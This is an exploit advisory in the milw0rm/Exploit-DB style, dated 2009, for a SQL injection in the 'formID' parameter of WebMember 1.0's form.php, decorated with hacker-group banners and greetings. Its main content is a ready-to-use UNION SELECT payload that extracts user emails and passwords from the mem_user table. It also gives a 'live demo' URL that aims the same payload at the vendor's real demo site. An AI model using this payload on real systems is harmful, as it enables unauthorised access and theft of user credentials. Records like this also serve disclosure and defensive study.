WebMember 1.0 - 'formID' SQL Injection

EDB-ID:

8810


Author:

KIM

Type:

webapps


Platform:

PHP

Date:

2009-05-26


==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
                                                                                      
                             WebMember 1.0 (formID) Remote SQL Injection Vulnerability                                  
                                                                                                             
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By:  KiM   :::ALGERIAN HaCkEr:::         =     =  
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =       =                 :::::E-mail : x0@hotmail.es:::::::               =         =
                =                                                                                    =
                =              Sript : http://www.phpmembers.com                                        =
                =               http://www.phpmembers.com/download.html                              =             
                 =================================== Snakespc ======================================   
   
[x] Note :You must Sign up......

[x] Exploit:
http://[host]/[script_path]/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM mem_user--
[x] Live demo:
http://demo.phpmembers.com/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM demo_user--

[x] Note2:
The injection's result will be in the link or inside the "Not Found" message
the default prefix of the table name is mem                                                         
===================================================================================================================
Greet'z : His0k4 ( My Love ^^ ) & Super_Cristal & CMOS_CLR17 & EVILWAY & Dr.OrYx & ALL ALGERIAN HACKERZ
str0ke.....>>>>.....milw0rm
===================================================================================================================

# milw0rm.com [2009-05-26]